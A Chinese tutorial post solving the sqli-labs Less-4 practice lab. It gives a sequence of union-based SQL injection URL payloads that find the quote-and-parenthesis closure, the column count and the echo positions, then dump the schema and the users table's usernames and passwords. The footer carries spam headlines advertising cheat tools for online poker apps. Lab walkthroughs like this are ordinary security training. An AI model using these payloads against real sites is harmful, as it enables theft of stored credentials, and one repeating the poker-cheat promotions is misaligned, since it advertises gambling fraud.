SQL注入实例(sqli-labs/less-4)
创始人
2024-11-10 08:09:48
0

0、初始页面

1、确定闭合符号

前两条判断是否为数值型注入,后两条判断字符型注入的闭合符号

?id=1 and 1=1  ?id=1 and 1=2 ?id=1" ?id=1")

2、确定表的列数

?id=1") order by 3 --+

3、确定回显位置 

?id=-1") union select 1,2,3 --+

4、爆库名

?id=-1") union select 1,user(),database() --+

5、爆表名

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

6、爆列名

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema='security' --+

7、显示最终目标

?id=-1") union select 1,2,group_concat(username,0x3a,password) from security.users --+

上一篇:AMD Radeon PRO Graphics

下一篇:来一盘!WePoKer真的是有挂,微扑克德州发牌规律(有挂手段)

相关内容

热门资讯

第八分钟辅助!嗨动互动辅助,确... 第八分钟辅助!嗨动互动辅助,确实是真的有辅助挂(竟然有挂)1、操作简单,无需嗨动互动辅助手机版透视脚...
截至目前!约局吧德州可以透视吗... 截至目前!约局吧德州可以透视吗,佛手在线有挂吗,阶段教程(有挂教学)1、每一步都需要思考,不同水平的...
6分钟辅助!游戏茶苑辅助,原来... 6分钟辅助!游戏茶苑辅助,原来真的是有辅助软件(今日头条)1、每一步都需要思考,不同水平的挑战会更加...
最新消息!wepoker有透视... 最新消息!wepoker有透视底牌吗,wepoker免费脚本弱密码,法子教程(有挂总结)亲,关键说明...
三分钟辅助!wepoker透视... 三分钟辅助!wepoker透视脚本下载,总是是真的有辅助器(有挂工具)1、wepoker透视脚本下载...
出乎意料的是!大菠萝免费辅助,... 出乎意料的是!大菠萝免费辅助,wepoker透视脚本免费下载,指南教程(有挂助手)1.wepoker...
第九分钟辅助!微信多乐辅助,竟... 第九分钟辅助!微信多乐辅助,竟然有辅助技巧(有挂详细)进入游戏-大厅左侧-新手福利-激活码辅助透视技...
第三方辅助!wepoker私局... 第三方辅助!wepoker私局代打,we poker辅助器v3.3,总结教程(有挂助手)一、we p...
第一分钟辅助!吉利比鸡辅助,都... 第一分钟辅助!吉利比鸡辅助,都是有辅助方法(确实有挂)进入游戏-大厅左侧-新手福利-激活码辅助透视技...
黑科技技巧!hhpoker是正... 黑科技技巧!hhpoker是正品吗,aapoker怎么设置提高好牌几率,法门教程(有挂攻略)1、打开...